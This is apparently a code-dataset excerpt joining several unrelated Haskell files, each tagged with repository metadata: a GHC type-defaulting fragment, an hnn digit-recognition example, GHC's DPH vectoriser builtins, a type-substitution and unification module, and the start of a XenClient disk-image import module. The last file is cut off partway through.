              -> [(Ct, Class, TcTyVar)]  -- All classes of the form (C a)
                                         --  sharing same type variable
              -> TcS Bool   -- True <=> something happened, reflected in ty_binds
disambigGroup [] _grp
  = return False
disambigGroup (default_ty:default_tys) group
  = do { traceTcS "disambigGroup {" (ppr group $$ ppr default_ty)
       ; fake_ev_binds_var <- TcS.newTcEvBinds
       ; given_ev_var      <- TcS.newEvVar (mkTcEqPred (mkTyVarTy the_tv) default_ty)
       ; tclvl             <- TcS.getTcLevel
         -- Solve in a throwaway scope so a failed attempt leaves no trace
       ; success <- nestImplicTcS fake_ev_binds_var (pushTcLevel tclvl) $
                    do { solveSimpleGivens loc [given_ev_var]
                       ; residual_wanted <- solveSimpleWanteds wanteds
                       ; return (isEmptyWC residual_wanted) }
       ; if success then
             -- Success: record the type variable binding, and return
             do { setWantedTyBind the_tv default_ty
                ; wrapWarnTcS $ warnDefaulting wanteds default_ty
                ; traceTcS "disambigGroup succeeded }" (ppr default_ty)
                ; return True }
         else
             -- Failure: try with the next type
             do { traceTcS "disambigGroup failed, will try other default types }"
                           (ppr default_ty)
                ; disambigGroup default_tys group } }
  where
    wanteds          = listToBag (map fstOf3 group)
    ((_,_,the_tv):_) = group
    loc = CtLoc { ctl_origin = GivenOrigin UnkSkol
                , ctl_env    = panic "disambigGroup:env"
                , ctl_depth  = initialSubGoalDepth }
{-
Note [Avoiding spurious errors]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When doing the unification for defaulting, we check for skolem
type variables, and simply don't default them. For example:
f = (*) -- Monomorphic
g :: Num a => a -> a
g x = f x x
Here, we get a complaint when checking the type signature for g,
that g isn't polymorphic enough; but then we get another one when
dealing with the (Num a) context arising from f's definition;
we try to unify a with Int (to default it), but find that it's
already been unified with the rigid variable from g's type sig
-}
| rahulmutt/ghcvm | compiler/Eta/TypeCheck/TcSimplify.hs | bsd-3-clause | 67,741 | 2 | 19 | 19,203 | 7,419 | 3,895 | 3,524 | 572 | 6 |
import AI.HNN.FF.Network
import Numeric.LinearAlgebra
-- | Training set: 5x5 binary "images" flattened row-major into a
-- 25-element input vector, paired with a 1-element target that is
-- 1 when the image depicts the digit three and 0 otherwise.
samples :: Samples Double
samples = [
    (fromList  [ 1, 1, 1, 1, 1
               , 0, 0, 0, 0, 1
               , 0, 0, 1, 1, 1
               , 0, 0, 0, 0, 1
               , 1, 1, 1, 1, 1 ], fromList [1]), -- three
    (fromList  [ 1, 1, 1, 1, 1
               , 0, 0, 0, 0, 1
               , 1, 1, 1, 1, 1
               , 0, 0, 0, 0, 1
               , 1, 1, 1, 1, 1 ], fromList [1]), -- three
    (fromList  [ 0, 1, 1, 1, 1
               , 0, 0, 0, 0, 1
               , 0, 0, 0, 1, 1
               , 0, 0, 0, 0, 1
               , 0, 1, 1, 1, 1 ], fromList [1]), -- three
    (fromList  [ 1, 1, 1, 1, 1
               , 1, 0, 0, 0, 1
               , 1, 0, 0, 0, 1
               , 1, 0, 0, 0, 1
               , 1, 1, 1, 1, 1 ], fromList [0]), -- not a three
    (fromList  [ 1, 1, 1, 1, 1
               , 1, 0, 0, 0, 0
               , 1, 0, 0, 0, 0
               , 1, 0, 0, 0, 0
               , 1, 0, 0, 0, 0 ], fromList [0]), -- not a three
    (fromList  [ 0, 1, 1, 1, 0
               , 0, 1, 0, 1, 0
               , 0, 1, 1, 1, 0
               , 0, 1, 0, 1, 0
               , 0, 1, 1, 1, 0 ], fromList [0]), -- not a three
    (fromList  [ 0, 0, 1, 0, 0
               , 0, 1, 1, 0, 0
               , 1, 0, 1, 0, 0
               , 0, 0, 1, 0, 0
               , 0, 0, 1, 0, 0 ], fromList [0]) ] -- not a three
-- | Build a 25-250-1 feed-forward network, train it for 10000 epochs
-- (learning rate 0.5, tanh activation), print the trained network's
-- output on every training input, then on an unseen test pattern
-- (which also looks like a three).
main :: IO ()
main = do
  n <- createNetwork 25 [250] 1
  let n' = trainNTimes 10000 0.5 tanh tanh' n samples
  mapM_ (print . output n' tanh . fst) samples
  putStrLn "-------------"
  print . output n' tanh $ testInput
  where testInput = fromList [ 0, 0, 1, 1, 1
                             , 0, 0, 0, 0, 1
                             , 0, 0, 1, 1, 1
                             , 0, 0, 0, 0, 1
                             , 0, 0, 1, 1, 1 ]
{-
OUTPUT:
fromList [0.9996325368507625]
fromList [0.9997784075859734]
fromList [0.9996165887689248]
fromList [-2.8107935971909852e-2]
fromList [7.001808876464477e-3]
fromList [2.54989546107178e-2]
fromList [5.286805464313172e-4]
-------------
fromList [0.9993713524712442]
-}
| alpmestan/hnn | examples/ff/three.hs | bsd-3-clause | 2,044 | 0 | 11 | 879 | 870 | 544 | 326 | 51 | 1 |
-- |Builtin types and functions used by the vectoriser. These are all defined in
-- 'Data.Array.Parallel.Prim'.
module Vectorise.Builtins.Base (
-- * Hard config
mAX_DPH_PROD,
mAX_DPH_SUM,
mAX_DPH_COMBINE,
mAX_DPH_SCALAR_ARGS,
aLL_DPH_PRIM_TYCONS,
-- * Builtins
Builtins(..),
-- * Projections
selTy, selsTy,
selReplicate,
selTags,
selElements,
selsLength,
sumTyCon,
prodTyCon,
prodDataCon,
replicatePD_PrimVar,
emptyPD_PrimVar,
packByTagPD_PrimVar,
combinePDVar,
combinePD_PrimVar,
scalarZip,
closureCtrFun
) where
import GhcPrelude
import TysPrim
import BasicTypes
import Class
import CoreSyn
import TysWiredIn hiding (sumTyCon)
import Type
import TyCon
import DataCon
import NameEnv
import Name
import Outputable
import Data.Array
-- Cardinality of the various families of types and functions exported by the DPH library.
-- | Largest product (tuple) arity supported by the DPH backend library.
mAX_DPH_PROD :: Int
mAX_DPH_PROD = 5
-- | Largest sum arity supported by the DPH backend library.
mAX_DPH_SUM :: Int
mAX_DPH_SUM = 2
-- | Largest arity of the @combinePD@ family of functions.
mAX_DPH_COMBINE :: Int
mAX_DPH_COMBINE = 2
-- | Maximum number of arguments of "scalar" vectorised functions.
mAX_DPH_SCALAR_ARGS :: Int
mAX_DPH_SCALAR_ARGS = 8
-- Types from 'GHC.Prim' supported by DPH
-- (NB: 'floatPrimTyCon' is commented out, i.e. Float# is currently unsupported.)
aLL_DPH_PRIM_TYCONS :: [Name]
aLL_DPH_PRIM_TYCONS = map tyConName [intPrimTyCon, {- floatPrimTyCon, -} doublePrimTyCon]
-- |Holds the names of the types and functions from 'Data.Array.Parallel.Prim' that are used by the
-- vectoriser.
--
-- | Cache of the types, classes, and functions from 'Data.Array.Parallel.Prim'
-- that the vectoriser inserts references to; looked up once and threaded
-- through the vectorisation passes.
data Builtins
        = Builtins
        { parrayTyCon          :: TyCon                     -- ^ @PArray@ (user-visible parallel array type)
        , pdataTyCon           :: TyCon                     -- ^ @PData@ (flattened representation)
        , pdatasTyCon          :: TyCon                     -- ^ @PDatas@
        , prClass              :: Class                     -- ^ @PR@ class
        , prTyCon              :: TyCon                     -- ^ @PR@ tycon
        , preprTyCon           :: TyCon                     -- ^ @PRepr@
        , paClass              :: Class                     -- ^ @PA@ class
        , paTyCon              :: TyCon                     -- ^ @PA@ tycon
        , paDataCon            :: DataCon                   -- ^ @PA@ data constructor
        , paPRSel              :: Var                       -- ^ @PA@ superclass (PR) selector
        , replicatePDVar       :: Var                       -- ^ @replicatePD@
        , replicatePD_PrimVars :: NameEnv Var               -- ^ @replicatePD_Int#@ etc.
        , emptyPDVar           :: Var                       -- ^ @emptyPD@
        , emptyPD_PrimVars     :: NameEnv Var               -- ^ @emptyPD_Int#@ etc.
        , packByTagPDVar       :: Var                       -- ^ @packByTagPD@
        , packByTagPD_PrimVars :: NameEnv Var               -- ^ @packByTagPD_Int#@ etc.
        , combinePDVars        :: Array Int Var             -- ^ @combinePD@
        , combinePD_PrimVarss  :: Array Int (NameEnv Var)   -- ^ @combine2PD_Int#@ etc.
        , scalarClass          :: Class                     -- ^ @Scalar@
        , scalarZips           :: Array Int Var             -- ^ map, zipWith, zipWith3
        , voidTyCon            :: TyCon                     -- ^ @Void@
        , voidVar              :: Var                       -- ^ @void@
        , fromVoidVar          :: Var                       -- ^ @fromVoid@
        , sumTyCons            :: Array Int TyCon           -- ^ @Sum2@ .. @Sum3@
        , wrapTyCon            :: TyCon                     -- ^ @Wrap@
        , pvoidVar             :: Var                       -- ^ @pvoid@
        , pvoidsVar            :: Var                       -- ^ @pvoids@
        , closureTyCon         :: TyCon                     -- ^ @:->@ (vectorised function arrow)
        , closureVar           :: Var                       -- ^ @closure@
        , liftedClosureVar     :: Var                       -- ^ @liftedClosure@
        , applyVar             :: Var                       -- ^ @$:@
        , liftedApplyVar       :: Var                       -- ^ @liftedApply@
        , closureCtrFuns       :: Array Int Var             -- ^ @closure1@ .. @closure3@
        , selTys               :: Array Int Type            -- ^ @Sel2@
        , selsTys              :: Array Int Type            -- ^ @Sels2@
        , selsLengths          :: Array Int CoreExpr        -- ^ @lengthSels2@
        , selReplicates        :: Array Int CoreExpr        -- ^ @replicate2@
        , selTagss             :: Array Int CoreExpr        -- ^ @tagsSel2@
        , selElementss         :: Array (Int, Int) CoreExpr -- ^ @elementsSel2_0@ .. @elementsSel_2_1@
        , liftingContext       :: Var                       -- ^ @lc@ (lifting context variable)
        }
-- Projections ----------------------------------------------------------------
-- We use these wrappers instead of indexing the `Builtin` structure directly
-- because they give nicer panic messages if the indexed thing cannot be found.
-- | Selector type of the given arity.
selTy :: Int -> Builtins -> Type
selTy = indexBuiltin "selTy" selTys

-- | Plural selectors type of the given arity.
selsTy :: Int -> Builtins -> Type
selsTy = indexBuiltin "selsTy" selsTys

-- | Length function for plural selectors of the given arity.
-- NB: the first argument to 'indexBuiltin' is only a label for panic
-- messages; it previously said "selLength", which did not match this
-- function's name and made panics harder to trace.
selsLength :: Int -> Builtins -> CoreExpr
selsLength = indexBuiltin "selsLength" selsLengths

-- | Replicate function for selectors of the given arity.
selReplicate :: Int -> Builtins -> CoreExpr
selReplicate = indexBuiltin "selReplicate" selReplicates

-- | Tags function for selectors of the given arity.
selTags :: Int -> Builtins -> CoreExpr
selTags = indexBuiltin "selTags" selTagss

-- | Elements function for selector arity @i@, alternative @j@.
selElements :: Int -> Int -> Builtins -> CoreExpr
selElements i j = indexBuiltin "selElements" selElementss (i, j)

-- | Sum type constructor of the given arity.
sumTyCon :: Int -> Builtins -> TyCon
sumTyCon = indexBuiltin "sumTyCon" sumTyCons
-- | Boxed tuple type constructor of the given arity.
-- Only arities 2..'mAX_DPH_PROD' are supported; anything else panics.
prodTyCon :: Int -> Builtins -> TyCon
prodTyCon n _
  | n >= 2 && n <= mAX_DPH_PROD
  = tupleTyCon Boxed n
  | otherwise
  = pprPanic "prodTyCon" (ppr n)

-- | Data constructor of the boxed tuple of the given arity.
-- Panics if the tuple tycon does not have exactly one data constructor
-- (which cannot happen for genuine tuples).
prodDataCon :: Int -> Builtins -> DataCon
prodDataCon n bi
  = case tyConDataCons (prodTyCon n bi) of
      [con] -> con
      _ -> pprPanic "prodDataCon" (ppr n)
-- | Type-specialised @replicatePD@ for the given primitive tycon.
replicatePD_PrimVar :: TyCon -> Builtins -> Var
replicatePD_PrimVar tc bi
  = lookupEnvBuiltin "replicatePD_PrimVar" (replicatePD_PrimVars bi) (tyConName tc)

-- | Type-specialised @emptyPD@ for the given primitive tycon.
emptyPD_PrimVar :: TyCon -> Builtins -> Var
emptyPD_PrimVar tc bi
  = lookupEnvBuiltin "emptyPD_PrimVar" (emptyPD_PrimVars bi) (tyConName tc)

-- | Type-specialised @packByTagPD@ for the given primitive tycon.
packByTagPD_PrimVar :: TyCon -> Builtins -> Var
packByTagPD_PrimVar tc bi
  = lookupEnvBuiltin "packByTagPD_PrimVar" (packByTagPD_PrimVars bi) (tyConName tc)

-- | @combinePD@ of the given arity.
combinePDVar :: Int -> Builtins -> Var
combinePDVar = indexBuiltin "combinePDVar" combinePDVars

-- | Type-specialised @combinePD@ of arity @i@ for the given primitive tycon.
combinePD_PrimVar :: Int -> TyCon -> Builtins -> Var
combinePD_PrimVar i tc bi
  = lookupEnvBuiltin "combinePD_PrimVar"
      (indexBuiltin "combinePD_PrimVar" combinePD_PrimVarss i bi) (tyConName tc)

-- | Scalar zip function of the given arity (map, zipWith, zipWith3, ...).
scalarZip :: Int -> Builtins -> Var
scalarZip = indexBuiltin "scalarZip" scalarZips

-- | Closure construction function of the given arity.
closureCtrFun :: Int -> Builtins -> Var
closureCtrFun = indexBuiltin "closureCtrFun" closureCtrFuns
-- | Get an element from one of the arrays of `Builtins`.
-- Panic if the indexed thing is not in the array.
-- | Get an element from one of the arrays of `Builtins`.
-- An out-of-range index means the DPH library does not provide that arity;
-- this is reported with 'pprSorry' (a known limitation, not a compiler bug).
indexBuiltin :: (Ix i, Outputable i)
             => String                   -- ^ Name of the selector we've used, for panic messages.
             -> (Builtins -> Array i a)  -- ^ Field selector for the `Builtins`.
             -> i                        -- ^ Index into the array.
             -> Builtins
             -> a
indexBuiltin fn f i bi
  | inRange (bounds xs) i = xs ! i
  | otherwise
  = pprSorry "Vectorise.Builtins.indexBuiltin"
      (vcat [ text ""
            , text "DPH builtin function '" <> text fn <> text "' of size '" <> ppr i <>
              text "' is not yet implemented."
            , text "This function does not appear in your source program, but it is needed"
            , text "to compile your code in the backend. This is a known, current limitation"
            , text "of DPH. If you want it to work, you should send mail to ghc-commits@haskell.org"
            , text "and ask what you can do to help (it might involve some GHC hacking)."])
  where xs = f bi
-- | Get an entry from one of a 'NameEnv' of `Builtins`. Panic if the named item is not in the array.
-- | Get an entry from one of a 'NameEnv' of `Builtins`.
-- A missing name means the DPH library lacks the type-specialised variant;
-- reported with 'pprSorry' (a known limitation, not a compiler bug).
lookupEnvBuiltin :: String    -- Function name for error messages
                 -> NameEnv a -- Name environment
                 -> Name      -- Index into the name environment
                 -> a
lookupEnvBuiltin fn env n
  | Just r <- lookupNameEnv env n = r
  | otherwise
  = pprSorry "Vectorise.Builtins.lookupEnvBuiltin"
      (vcat [ text ""
            , text "DPH builtin function '" <> text fn <> text "_" <> ppr n <>
              text "' is not yet implemented."
            , text "This function does not appear in your source program, but it is needed"
            , text "to compile your code in the backend. This is a known, current limitation"
            , text "of DPH. If you want it to work, you should send mail to ghc-commits@haskell.org"
            , text "and ask what you can do to help (it might involve some GHC hacking)."])
| ezyang/ghc | compiler/vectorise/Vectorise/Builtins/Base.hs | bsd-3-clause | 8,557 | 0 | 14 | 2,922 | 1,447 | 812 | 635 | 164 | 2 |
-- Time-stamp: <2010-05-14 11:08:06 cklin>
module Substitution where
import Data.List ((\\), union)
import qualified Data.Map as Map
import Types
import Common
import Monad
--------- General substitution utility functions
-- Construct a substitution. This factory function checks that the
-- mapping is idempotent and reports an error otherwise. Note that
-- compoSub (and perhaps other too) can produce identity mappings (e.g.,
-- [x/x]) in the associative list, so the algorithm must sanitize the
-- mapping (to mp0) to avoid tripping the idempotency checking.
-- | Build a substitution from an association list, first dropping identity
-- mappings such as [x/x] (which e.g. 'compoSub' can produce), then checking
-- that the result is idempotent: the domain must not overlap the meta
-- variables occurring in the range.
makeSub :: [(Int, Type)] -> Subst
makeSub mapping
    | overlaps domain range = bug "Mapping is not idempotent"
    | otherwise             = toMap nontrivial
    where nontrivial = filter (\(i, t) -> TyMeta i /= t) mapping
          domain     = map fst nontrivial
          range      = unionMap (metaType . snd) nontrivial
-- | The empty substitution.
zeroSub :: Subst
zeroSub = Map.empty
-- | A single-binding substitution.
oneSub :: Int -> Type -> Subst
oneSub = Map.singleton
-- | True iff the substitution binds nothing.
nullSub :: Subst -> Bool
nullSub = Map.null
-- Compute the domain and the range of a substitution.
domSub :: Subst -> [Int]
domSub = Map.keys
rngSub :: Subst -> [Type]
rngSub = Map.elems
-- | All meta type variables mentioned by a substitution (domain plus
-- the variables occurring in the range).
metaSub :: Subst -> [Int]
metaSub sub = domSub sub `union` metaTypes (rngSub sub)
-- Apply a substitution to a type. Since substitution mappings are
-- idempotent, there is no need for iterative application.
-- | Apply a substitution to a type.  One pass suffices because
-- substitutions are idempotent by construction ('makeSub').
zonk :: Subst -> Endo Type
zonk sub = replace where
      replace (TyCon tc ax) = TyCon tc (map replace ax)
      replace t@(TyMeta i) = Map.findWithDefault t i sub
      -- Skolem constants must never be substituted for; a hit here means
      -- the caller built an ill-formed substitution.
      replace (TySkol i) | Map.member i sub =
          bug "Substitution on Skolem type"
      replace t = t
-- | Apply a substitution directly to a meta type variable index.
zonkIndex :: Subst -> Int -> Type
zonkIndex sub i = Map.findWithDefault (TyMeta i) i sub
-- Rename meta type variables in a type. Unlike substitutions, this
-- dedicated renaming function does not care about the orientation of
-- type variable renaming.
-- | Rename meta type variables in a type.  Unlike substitutions, this
-- dedicated renaming function does not care about the orientation of
-- type variable renaming.
renameMeta :: Rename -> Endo Type
renameMeta ren = replace where
      replace (TyCon tc ax) = TyCon tc (map replace ax)
      replace (TyMeta i) = TyMeta (lookupZ i ren)
      replace t = t
-- | Replace free (bound-by-quantifier) type variables with (supposedly
-- fresh) meta type variables drawn from the given instantiation map.
-- Not strictly a substitution, but closely related.
instType :: Map.Map Ident Int -> Endo Type
instType inst = replace where
      replace (TyCon tc ax) = TyCon tc (map replace ax)
      replace (TyVar tv) = TyMeta (lookupX tv inst)
      replace t = t
-- Compute a substitution that forces the second type (t) to have the
-- same top-level type constructor as the first type (c) .
-- | Compute a substitution that forces the second type (t) to have the
-- same top-level type constructor as the first type (c): freshen c's
-- arguments, then unify with t.
imprintTc :: Type -> Type -> Ti Subst
imprintTc c t =
    do u <- freshenTyCon c
       unify2 u t
-- | Substitution that replaces each listed meta type variable with a
-- Skolem constant of the same index ('unskolemize' reverses this).
skolemize :: [Int] -> Subst
skolemize = makeSub . map skol
    where skol m = (m, TySkol m)
-- | Turn Skolem constants back into meta type variables with the same index.
unskolemize :: Endo Type
unskolemize = replace where
      replace (TyCon tc ax) = TyCon tc (map replace ax)
      replace (TySkol i) = TyMeta i
      replace t = t
-- Compose two substitutions. The function uses nub1st to arbitrate
-- (favoring sub2) when the domains overlap. Composition is not
-- commutative, and tv(rng(sub1)) must be disjoint from dom(sub2) with
-- the exception of reverse renaming (see example).
-- zonk sub1 (zonk sub2 t) == zonk (compoSub sub1 sub2) t
-- compoSub [x/y] [y/x] == [x/y]
-- | Compose two substitutions:
-- zonk sub1 (zonk sub2 t) == zonk (compoSub sub1 sub2) t.
-- When domains overlap, 'nub1st' arbitrates in favour of sub2 (its
-- entries come first in the list).
compoSub :: Subst -> Endo Subst
compoSub sub1 sub2 = makeSub (nub1st (mp2 ++ mp1)) where
      mp1 = Map.toList sub1
      -- sub2's range is rewritten through sub1 before merging.
      mp2 = Map.toList (Map.map (zonk sub1) sub2)
-- | Left-to-right composition of a list of substitutions.
compoSubs :: [Subst] -> Subst
compoSubs = foldl compoSub zeroSub
-- Restrict the domain of a substitution.
restrictSub :: [Int] -> Endo Subst
restrictSub mx = Map.filterWithKey relevant
    where relevant i _ = i `elem` mx
-- | Apply an idempotent variable renaming to both the domain and the
-- range of a substitution, e.g. switchMetaSub [a/x, b/y] [T x/y] == [T a/b].
switchMetaSub :: Rename -> Endo Subst
switchMetaSub ren = makeSub . map switch . Map.toList
    where switch (i, t) = (lookupZ i ren, renameMeta ren t)
-- Restrict an idempotent substitution to the parts that have nontrivial
-- effects on the given set of type variables. More specifically, the
-- function restricts the domain to the type variables of interest, and
-- then it eliminates trivial type variable mappings (i.e., renaming).
-- | Restrict an idempotent substitution to the parts that have
-- nontrivial effects on the given type variables: restrict the domain
-- to mx, then drop pure renamings whose target occurs only once.
shaveSub :: [Int] -> Endo Subst
shaveSub mx sub = shaven where
      trimmed = restrictSub mx sub
      -- nontriv i: variable i appears more than once in the range, so a
      -- mapping to it carries sharing information and must be kept.
      nontriv = multiP (rngSub trimmed)
      keep (TyMeta i) = nontriv i || elem i mx
      keep _ = True
      shaven = Map.filter keep trimmed
-- | Extend a substitution with fresh variables so that every meta type
-- variable in dom is in the domain of the result.
divertSub :: [Int] -> EndoTi Subst
divertSub dom sub =
    do let gap = dom \\ domSub sub
       fresh <- freshenTv gap
       let fill = makeSub (zip gap fresh)
       return (compoSub fill sub)
--------- Plain unification functions
-- | Solve a list of type equations, threading the accumulated
-- substitution through the remaining equations.
unify :: [Type2] -> Ti Subst
unify [] = return zeroSub
unify ((t1, t2):tx) =
    do this <- unify2 t1 t2
       let norm (u1, u2) = (zonk this u1, zonk this u2)
       rest <- unify (map norm tx)
       return (compoSub rest this)
-- | Unify two types.  Bound type variables must have been instantiated
-- away ('instType') before unification.
unify2 :: Type -> Type -> Ti Subst
unify2 (TyVar _) _ = bug "Bound type variable in unify2"
unify2 _ (TyVar _) = bug "Bound type variable in unify2"
unify2 (TyMeta i1) (TyMeta i2) | i1 == i2 = return zeroSub
unify2 (TyMeta i1) t2 = unifyMeta i1 t2
unify2 t1 (TyMeta i2) = unifyMeta i2 t1
unify2 (TySkol i1) (TySkol i2) | i1 == i2 = return zeroSub
unify2 (TySkol _) _ = fail "Cannot unify with a Skolem type"
unify2 _ (TySkol _) = fail "Cannot unify with a Skolem type"
unify2 (TyCon tc1 ax1) (TyCon tc2 ax2) =
    -- 'magic' controls the orientation bias of the resulting
    -- substitution; see the comment at its definition.
    if tc1 == tc2 && length ax1 == length ax2
    then unify (magic $ zip ax1 ax2)
    else fail "Cannot unify different type constructors"
-- | Bind a meta variable, with an occurs check to rule out infinite types.
unifyMeta :: Int -> Type -> Ti Subst
unifyMeta i t =
    if elem i (metaType t)
    then fail "Unification produces an infinite type"
    else return (oneSub i t)
-- | Unify all types in a list pairwise (each with its successor).
unifyTypes :: [Type] -> Ti Subst
unifyTypes [] = unify []
unifyTypes tx = unify (zip (tail tx) tx)
-- Unifiability testing. If the given type equations / types are
-- satisfiable, return a most-general unifier as evidence. The function
-- uses trapTi to present a non-monadic interface.
-- | Non-monadic unifiability test: Just a most-general unifier on
-- success, Nothing on failure.
unifiable :: [Type2] -> Maybe Subst
unifiable = trapTi . unify
unifiableTypes :: [Type] -> Maybe Subst
unifiableTypes = trapTi . unifyTypes
--------- Substitution unification algorithm
-- Compute a most-general common instance of the input substitutions.
-- This algorithm is so much simpler than McAdam's substitution
-- unification, and it extends naturally to more than two substitutions.
combineSub :: Subst -> EndoTi Subst
combineSub sub1 sub2 = combineSubs [sub1, sub2]
-- | Treat every binding (i, t) as an equation TyMeta i = t and solve
-- them all at once.
combineSubs :: [Subst] -> Ti Subst
combineSubs = unify . map1st TyMeta
            . concatMap (magic . Map.toAscList)
--------- Substitution orientation bias
-- The "magic" switch controls how the algorithm orients type
-- substitutions, which in turn affects how it picks type parameters and
-- type indices by breaking the symmetry in scrutinee and pattern types.
-- With magic turned off (i.e., magic = id), the algorithm exhibits the
-- bias that type indices come before type parameters. With magic
-- turned on (i.e., magic = reverse), the algorithm exhibits the
-- opposite bias: type parameters come before type indices. The magic
-- does not formally change the expressiveness of Algorithm P, but it
-- does seem to fit currently programming practices better (and it
-- allows the implementation to infer expected types for both runState_o
-- and fdComp1).
magic = reverse
| minad/omega | vendor/algorithm-p/Substitution.hs | bsd-3-clause | 7,807 | 0 | 13 | 1,623 | 1,844 | 954 | 890 | 120 | 4 |
--
-- Copyright (c) 2013 Citrix Systems, Inc.
--
-- This program is free software; you can redistribute it and/or modify
-- it under the terms of the GNU General Public License as published by
-- the Free Software Foundation; either version 2 of the License, or
-- (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- GNU General Public License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with this program; if not, write to the Free Software
-- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
--
{-# LANGUAGE PatternGuards #-}
module Import.Images
(
DIM
, ImportedDiskImage (..)
, importDiskImages
, writeDIM
, readDIM
, getDiskImportedPhysPath
, getDiskImportedKeyPath
)
where
import Control.Applicative
import Control.Arrow
import Control.Monad
import Control.Monad.Error
import qualified Control.Exception as E
import Control.Concurrent
import Data.Maybe
import Data.List
import qualified Data.ByteString.Lazy as BL
import Text.Printf
import System.FilePath
import System.IO
import System.Directory
import Tools.Process
import Tools.Misc
import Tools.Text
import Appliance
import VirtualSystem
import Import.Types
import Import.Monad
import Import.Files
import Util
-- | Mapping from disks to their imported images.  A 'Nothing' key marks a
-- shared image usable by any disk referencing its image ID; a 'Just' key
-- ties an instanced image to one specific disk.
type DIM = [(Maybe DiskID, ImportedDiskImage)]
-- | A disk image that has been materialised on the host.
data ImportedDiskImage
   = ImportedDiskImage
     { idiID :: DiskImageID    -- ^ image ID from the appliance description
     , idiData :: IDIData }    -- ^ where the image (and key) live on disk
-- | On-host locations for an imported image.
data IDIData
   = IDIData { idiPhysPath :: FilePath         -- ^ physical path of the image file
             , idiKeyPath :: Maybe FilePath }  -- ^ encryption key file, if encrypted
-- Convenience projections through 'idiData'.
idiPhysPath' = idiPhysPath . idiData
idiKeyPath' = idiKeyPath . idiData
-- | Render one DIM entry as a line of the form
-- @imageID=physPath keyPath sysID index@.  Spaces inside fields are
-- escaped as "%20" so the line can be split on spaces when read back;
-- for shared images (no DiskID) sysid/index serialise as empty fields.
serialiseDIMEntry :: (Maybe DiskID, ImportedDiskImage) -> String
serialiseDIMEntry (diskID, idi) =
    printf "%s=%s %s %s %s" (q idiIDStr) (q $ idiPhysPath' idi) (q . fromMaybe "" $ idiKeyPath' idi) (q sysid) (q index)
    where
      -- escape embedded spaces; inverse of 'dq' in deserialiseDIMEntry
      q x = replace " " "%20" x
      DiskImageID idiIDStr = idiID idi
      sysid = case diskID of
        Just (DiskID (VirtualSystemID str) _ ) -> str
        _ -> ""
      index = case diskID of
        Just (DiskID _ index) -> show index
        _ -> ""
-- | Parse one line produced by 'serialiseDIMEntry'.  A populated
-- sysid/index pair yields an instanced entry (Just DiskID); empty ones
-- yield a shared entry.  Returns Nothing for malformed lines.
deserialiseDIMEntry :: String -> Maybe (Maybe DiskID, ImportedDiskImage)
deserialiseDIMEntry str =
    case split '=' str of
      [k, v] -> case split ' ' v of
        [path, keypath, sysid, index] | not (null sysid)
                                      , not (null index) -> Just $
            ( Just (DiskID (VirtualSystemID (dq sysid)) (read (dq index)))
            , ImportedDiskImage (DiskImageID (dq k)) (IDIData (dq path) (mkKeyPath $ dq keypath)))
        [path, keypath, _, _ ] -> Just $
            ( Nothing
            , ImportedDiskImage (DiskImageID (dq k)) (IDIData (dq path) (mkKeyPath $ dq keypath)))
        _ -> Nothing
      _ -> Nothing
    where
      -- undo the "%20" space escaping applied by serialiseDIMEntry
      dq x = replace "%20" " " x
      mkKeyPath "" = Nothing
      mkKeyPath p = Just p
-- | Persist a DIM to a file, one serialised entry per line.
writeDIM :: FilePath -> DIM -> IO ()
writeDIM path = writeFile path . unlines . map serialiseDIMEntry
-- | Read a DIM back; malformed lines are silently dropped.
readDIM :: FilePath -> IO DIM
readDIM path = catMaybes . map deserialiseDIMEntry . lines <$> readFile path
-- | Virtual systems declared by an appliance.
systems app = contentVirtualSystems $ appContent app
-- | Find the imported image backing a disk.  Entries recorded for this
-- exact disk (matching DiskID and image ID) take precedence; otherwise
-- fall back to any entry whose image ID matches.
getImportedDiskImage :: Disk -> DIM -> Maybe ImportedDiskImage
getImportedDiskImage d dim = listToMaybe . map snd $ (filter match1 dim ++ filter match2 dim) where
    -- image ID referenced by a disk, if it has a backing image at all
    imageID d = diID `fmap` diskImage d
    imageMatches d imgid =
        case imageID d of
          Nothing -> False
          Just iid -> iid == imgid
    -- exact match: same disk identity and same image
    match1 (Just diskid, idi) = diskid == diskID d && imageMatches d (idiID idi)
    match1 _ = False
    -- fallback: any entry with a matching image ID
    match2 (_, idi) = imageMatches d (idiID idi)
    -- NB: the previous hand-rolled safeHead duplicated Data.Maybe's
    -- listToMaybe, which this module already imports.
-- | Physical path of the image backing a disk, if imported.
getDiskImportedPhysPath :: Disk -> DIM -> Maybe FilePath
getDiskImportedPhysPath d dim = idiPhysPath' <$> getImportedDiskImage d dim
-- | Encryption key path for a disk's image, if imported and encrypted.
getDiskImportedKeyPath :: Disk -> DIM -> Maybe FilePath
getDiskImportedKeyPath d dim = join (idiKeyPath' <$> getImportedDiskImage d dim)
-- | Distinct shared disk images referenced by any of the systems.
sharedDiskImages :: [VirtualSystem] -> [DiskImage]
sharedDiskImages systems = nubBy (\a b -> diID a == diID b) . filter diShared $ vsImages where
    vsImages = concatMap vsImages' systems
    vsImages' = catMaybes . map diskImage . vsDisks where
-- | Non-shared images, each paired with the disk that owns it.
instancedDiskImages :: [VirtualSystem] -> [(DiskID, DiskImage)]
instancedDiskImages systems = filter (not . diShared . snd) $ vsImages where
    vsImages = concatMap vsImages' systems
    vsImages' = catMaybes . map f . vsDisks where
        f disk = case diskImage disk of
          Just img -> Just (diskID disk, img)
          _ -> Nothing
-- | Import every disk image referenced by the appliance: shared images
-- once each (keyed Nothing), instanced images once per owning disk.
importDiskImages :: App -> Import DIM
importDiskImages app = do
  let shared = sharedDiskImages $ systems app
      instanced = instancedDiskImages $ systems app
  shared_ <- zip (repeat Nothing) <$> mapM (importDiskImage (appID app)) shared
  instanced_ <- mapM importInstance instanced
  return (shared_ ++ instanced_)
  where
    importInstance (diskid, img) = do
      idi <- importDiskImage (appID app) img
      return (Just diskid, idi)
-- | Dispatch on image type to the appropriate importer.
importDiskImage :: AppID -> DiskImage -> Import ImportedDiskImage
importDiskImage appid im = case diType im of
  VHD -> importDiskImageVHD appid im
  ISO -> importISO im
  RawFilesystem -> importRawFilesystem appid im
  CPIO -> importCPIO appid im
-- | Import an ISO image; with no file specified, point at the stock
-- empty ISO instead of creating anything.  ISOs are never encrypted.
